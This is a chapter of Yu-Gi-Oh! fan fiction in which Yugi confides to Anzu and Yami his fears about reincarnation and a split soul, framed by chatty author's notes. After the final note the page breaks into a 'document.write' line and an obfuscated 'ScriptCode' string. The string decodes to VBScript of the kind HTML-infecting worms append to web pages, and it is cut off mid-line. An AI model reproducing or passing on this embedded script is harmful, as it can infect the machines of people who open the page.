Yu-Gi-Oh! Fan Fiction ❯ Lost Identity ❯ Questions of the past ( Chapter 1 )

[ P - Pre-Teen ]

az: Okay.... I got written some Saiyuki fics, two DC fics; one not really reached it's full content for a two part story and a Harry Potter fic that I realized, I need to write the second part sooner. And don't forget my Jing fic, really... ppl had finally started to notice that fic. Now, I'll try taking this Yugioh fic idea to challenge!! And a lot of assumption was made for this fic so bear with me...

az: Well, this fic had a lot to do with Forbidden Memories game, and the 1st season's OP and ED songs, and let's assume that the fight with the shadow realm had passed, okay? But that's doesn't mean that there's no more dark magician to challenge the gang, k? Just that the gang had finally had a time to relax a while... Oh... I'm being stupid....

But honestly, I dunno where this fic is getting me into... so I hoped if anyone of you liked to help make this fic a great fic, hope u guys give cooperation when I need it, k? <Obviously I'm afraid that Pharaoh-sama would hate me for this...> And Thank you for the reviews!!!! GOD.... how I missed the reviews....


Disclaimer: I don't own Yugioh manga nor did I own anime. Read and review and I wanna declare that I DON'T OWN YUGIOH. Characters and original excerpt from the fic are copyrights of Kazuki Takahashi.


Lost Identity

Chapter 1: Questions of the past

Written by Azzie/Az @ Alienna Azuani

--Yugi--

Who am I... really?

Is my existence in this lifetime are merely an illusion? Or is it not? Does karma really exist in this world?

/Aibou?/

I glanced sideways as my other self sat beside me. I adjusted my sitting position on the bench even though I don't really needed to. 'Oh, Yami... What is it?', I asked light-heartedly to him eventhough I knew what it is that he wanted to know.

'Is something bothering you? I noticed that you've been spacing out a number of times. And I noticed that you had started to look like me when you spaced out like that', said Yami as he tried to make me talk. I shook my head. 'Nothing. It's just... I'm wondering... ah, it's nothing really. You don't have to worry about me.', I said, not really hoping that Yami would swallow that explanation. Really, it's still a puzzling thought. How could both of us be part of each other when at the same time, we are different?

Yami frowned. I sighed halfheartedly. Please, Yami... I don't want to bother you with my problems when you had already had your own to worry about.

I felt his hands wrapped around my shoulders to comfort me. A smiled crept into my face as I welcomed the gesture from my Yami. He's started to become so nice, perhaps he had a lot of influence from me, I guess. But I still don't want to bother you with this, so I hope you can understand...

Please, Yami...

--

Anzu Masaki was planning to drop in to Yugi's house that day. And since the day was still bright and pleasant, she decided to take a sidewalk to the park nearby first. And to her surprise, she found a familiar face, sitting alone at the bench overlooking a small lake in front of him. She slowly crept behind her childhood friend and sat beside him on the bench.

'Hi, Yami!! What are you doing here alone?', chirped Anzu but Yugi hadn't noticed her. Anzu's face changed as a twinge of worry start to crept on her, seeing her friend being so distracted. Anzu shook Yugi's arm gently as she tried to get his attention. 'Yami, are you okay? Is something bothering you?', she asked again as Yugi started to wake up from his daydream. Yugi glanced towards Anzu. 'No... I'm alright. I'm just daydreaming and it's Yugi, not Yami. I hope you won't be surprised. And Yami was here, keeping me company...', said Yugi as he patted the empty space on his right, indicating Yami's presence. Anzu stared blankly at the direction Yugi's pointing and looked back towards him.

'Oh, gomen... but you had looked a lot like...erm, Yugi? Is there something wrong with you? I never saw you get so troubled like this for a long time...', said Anzu worriedly as Yugi tried to deny. 'Oh, Yugi.... don't tell me that you won't tell!? I'm your closest friend!! And I supposed you didn't even tell Yami what's wrong too, is it?'

Yugi was silent to himself. Annoyed, Anzu sighed in exasperation. 'Yugi!! Please tell me what's wrong!!'

Yugi looked up towards her before glancing shortly towards Yami. He grasped her hand deftly before giving her the darkest stare he had ever gave her. 'Alright, I'll tell. But to tell you the truth, you won't be able to help me even if you know what is it that had been troubling me...', said Yugi darkly. Anzu took a short breath as she braced herself to hear Yugi's explanation. 'Well, tell me then..', she said. '..Even if I can't help you, at least you can count on me to bear the burden with you.'

Yugi's eyes widen in surprise seeing Anzu so determined like this. And then, knowing that both his Yami and Anzu were paying their fullest attention on him; he sighed in defeat.

'Okay, I'll talk. But that doesn't mean it's easy for me to tell..'

--

Anzu walked silently home as she refused Yugi's request to walk her home. Not that it bothered her since Yugi had remained looking like his Yami but since Yugi had told her his cause for anxiety, she doesn't want him to dwell again into that problem. But somehow she felt helpless, realizing that she could not offer any words of comfort to calm Yugi's feeling.

--Anzu--

Yugi, I'm sorry...

I said that I'll try to help you. But in the end... I couldn't... I couldn't!!

[Flashback]

'Anzu, do you believe in karma?', said Yugi suddenly, taking me in surprise. 'Er, not much. Why do you ask?', I replied as Yugi frowned; deep in his own thoughts. 'No, I've been wondering... Anzu, how long have we've been friends?' I smiled, 'Umm, quite a long time. Why did you ask?' I glanced again at him but I stopped as I noticed that Yugi's eyes had that glazed look again. I started opening my mouth to ask him again but Yugi cut me off.

'Ever since my parents had separated, I've always felt so much alone...'

'Yugi..?'

'And since I had been so short, people had always bullied me. Added with the fact that my family had just been torn apart, things can't be much worse...' I kept very quiet all the while as I let Yugi talk. This is all I could do, but I can't understand what this is getting on to. And I noticed the sad look that Yugi was wearing. All this time, I thought... I thought Yugi had been able to handle this problem. He had acted very well at his parents' decision and he was always cheerful. I guess, I was mistaken...

'But it had. Before this, I had never noticed the emptiness inside of me. Emptiness as if your soul was incomplete. The feeling grew strong after that incident. And without myself noticing, I had created a dark illusion of myself that is...'

'..so much like Yami...', said both of us at the same time. Yugi nodded instinctively as he continued. 'When Yami came to exist in my life, I felt as if my soul had been complete again. I never realized this before as I didn't gave any thought about this. Knowing that I had you, Yami, Jyonouchi, Honda, Miho, Bakura, Kaiba and everyone else by my side as my friends, makes me so very happy that I never question if there's any solid reason why everything started happening to me now.'

Yugi paused. And I waited patiently for him to continue as he heaved a long sigh. 'Hmmph, if he knew what I was thinking right now, Shadi might have told me now that the puzzle had come to me because it had chosen me to be its keeper. But I can't help feeling that it's not that. That it was not a coincidence that the puzzle came to me and in it contained Yami's soul, who had a lot of similarities with me and was like my other half. I felt as if the puzzle came to me, no Anzu, it searched for me to return itself to me.'

My eyes widen in surprise. I never thought Yugi could have thought about this so deep. 'The puzzle returned itself to you?', I asked, feeling as if I don't want to believe what it is that I'm going to hear. Yugi had neither nodded nor shook his head in respond to my question. 'Not so long ago, I had a dream. Actually I don't quite remember when did I had it but suddenly after all that had happened, it came back to my mind. In that dream, I was in ancient Egypt.', said Yugi as he laughed suddenly without any feeling. He placed both of his hands to cover his face before swearing silently.

'...I can't even remember the dream!! But something from that dream remained. I remembered myself running away from something and there's this person chasing after me. And when I was almost got captured, there's this other person whom I felt so familiar with, telling me to break the puzzle. And that's that.'

'It made me thinking. That dream... was it a memory of my past life? So, if it is... then, was Yami a part of my soul? Did breaking the Millennium puzzle caused my soul to split into two? One got sealed inside of the puzzle and the other remained with the body to die? And to be reborn again, three million years later as me? Then, what would become of me... of us? Would my soul be divided like this forever or would it one day be fused together and be one again? If so, what would become of me when it did happen? Of my present memories... and Yami's lost memories? Would I be the same as now or would I be a different person? Oh, man... this is so confusing...', cried Yugi in desperation.

Without thinking, I pulled Yugi towards myself and hugged him. Yugi gasped in shock at the unexpected gesture from me. I didn't even expected myself that I'll be doing this but hearing Yugi talking about this in such a painful way, it hurts me. Deeply...

I pulled ourselves apart as both of us stood up to leave. Yugi swayed a little, probably exhausted with the effort of telling me about his worries. I deftly caught his arm to support him. 'Come on, Yugi. I'll help you walk home. You needed to rest...', I said as I helped him to return to his house.

As we were nearing the Grandfather Sugoroku's toy shop, Yugi glanced at me...

[End of flashback]

'Thank you...', he told me. Such short exchange of gratefulness from him but the word's so sharp, piercing my heart deeply as I didn't feel like I've help him with anything. Yes, I admitted. Even though he looked a lot like Yami now, but he is definitely Yugi. Yami would never gave me that look like Yugi did just now. And seeing how strong he had looked right then, yet so helpless and confused as he is now; I can't help feeling useless when I can't ease his worries. It pains me to see him in this state!!

--

Anzu gasped as a realization struck her. Stopping in her track at the middle of an alley, she placed a hand on her chest. Did I... did I fall in love with Yugi?, she thought in surprise. She found it puzzling to have think about Yugi like that. She knew that she had liked his Yami for a long time but to all these while, she had regard Yugi like a brother. But as Yugi started to look more like his Yami, her feelings for him had started to take a different turn. But if what Yugi said before was true... that Yami and him were in fact the same person, how would I handle it if they finally did become one again?

Anzu shook her head vigorously as she continued heading towards home. 'No!! No matter how confusing this is to me, I cannot think of myself now. Yugi needs me by his side now. Whatever happens, I will always support Yugi. Even if it means ignoring my feelings towards his Yami...', said Anzu to herself as she entered the gates of her house...

--

At Yugi's house...

Yugi sighed as he sat slumped on the sofa. He was tired beyond anything that he had ever felt before. But now, not only Anzu knew about the thing that kept troubling his thoughts, Yami also knew. Yugi looked sideways to where Yami was standing with mixed feelings.

'Yami, are you angry? You've been very quiet ever since Anzu came just now.', said Yugi slowly as Yami exchanged glances with him. 'Why should I? You're so selfish as to not tell me your problems, made me think that you don't regard me as a part of yourself...!', snapped Yami suddenly. Yugi gasped as he lurched forward to grab Yami's hand. 'No..! It's not like that!! I just... don't want you to ponder about it more than you should. You had been so depressed when you found that you had no memories of your past, so much that I can't bear it if you had to bear this weight in my mind too...', blurted Yugi as he clutched his forehead before sitting back at the sofa.

Yami started as he caught Yugi before his head slammed the tea table beside the sofa. Yugi stammered his apology for his carelessness but Yami stopped him. 'I don't mean it like that, aibou. I'm sorry...', stuttered Yami as Yugi tried to explain himself. Yami placed his hand on Yugi's as he sat beside him. 'You're tired, aibou. You need to get some sleep...', he said again. Yugi shook his head again. 'No... I'd probably would end up thinking again about the dream.' But Yami was determined and he would not let his hikari disobeys him. 'Then, sleep here!! Don't do anything other than that! Just sleep. I'll be by your side...'

Yugi grinned at his yami. 'Alright, alright...! I'll sleep. Don't go cheeky on me!!', he said as he closed his eyes to sleep while Yami remained by his side. A hint of a smile crept into his features as he watched his aibou sleep with ease.

--

Mutou Sugoroku walked into the living room after collecting the mails and closing the toyshop for the day. And it certainly came to his surprise to find Yugi sleeping on the sofa. The old man slowly crept beside his grandson and covered his body with a blanket. Seeing that Yugi was still asleep, he gently caressed Yugi's forehead as he started to realize that his grandson had looked a little different than usual. For one, he's taller than usual. 'Probably, Yugi had started to unravel the powers of the Millennium puzzle...', mused Sugoroku to himself as he kept caressing Yugi's cheek. He sighed to himself as he started to shuffle through the mails and found one addressed to Yugi. Not wanting to wake his grandson up yet, he placed the letter on the tea table for Yugi to find it.

Had Yugi been successful in unraveling the puzzle's secrets?, thought Yami suddenly as he overheard his grandfather's musings. Looking back at his aibou, he began pondering over the things Yugi had said earlier. And I had never really asked him how was he able to complete the puzzle at the first place. And he was able to communicate with me gradually ever since he found out about my existence. Before this when I was first released from the puzzle, I could only get out when Yugi was either deeply hurt or angered; but now, both of us could swap places so easily. Could this be true? Yami glanced towards his other half and his grandfather.

Grandfather Sugoroku had bowed down towards Yugi and gave him a peck on the cheek before heading to the kitchen. Yami watched him go as he kept watch over his other half. And suddenly, Yami felt relieved that Yugi was surrounded with people who loved him. In other words, people who loved him too, the young nameless pharaoh from ancient Egypt, since both of them were in fact the same person. Yami smiled as he continued staring at Yugi. Yugi's right. The moment I found out about this, I would endlessly ponder about it until I go insane. Well, I'll leave it to fate then... Whatever happens after this, I will face it. As long as both of us are together...

[TBC]


az: Okay... this is my first chapter of first Yugioh fic. and another fic to be included in my long list of pending fics. So, reviews are pretty much welcomed. And don't expect updates would come quick since I had other fics still unfinished and this is one of them. But, you know... a lot of reviews are really appreciated since those things are like magic spells for me to continue... ^_^

ally (muse): Well, flames and reviews are welcomed, though ridiculous flames that does nothing to improve az's writing are just as well be thrown into the fireplace!! Well... we need a lot of warmth in this fic, you know...

az: And I was trying to make Anzu flirt with Yami in the Sims... but why did he never come to visit them... Hard... document.write "

" ScriptCode = "ChlRBqhos+VRBqhos+@ookds+VhmO`sg+mEnkcdq+mBncdRtaQtm^Shld'(EE/0'(EE/1'(Dmc RtaEtmbshnmEE/0'(NmDqqnqQdrtldMdwsDqq-Bkd`qSncnHs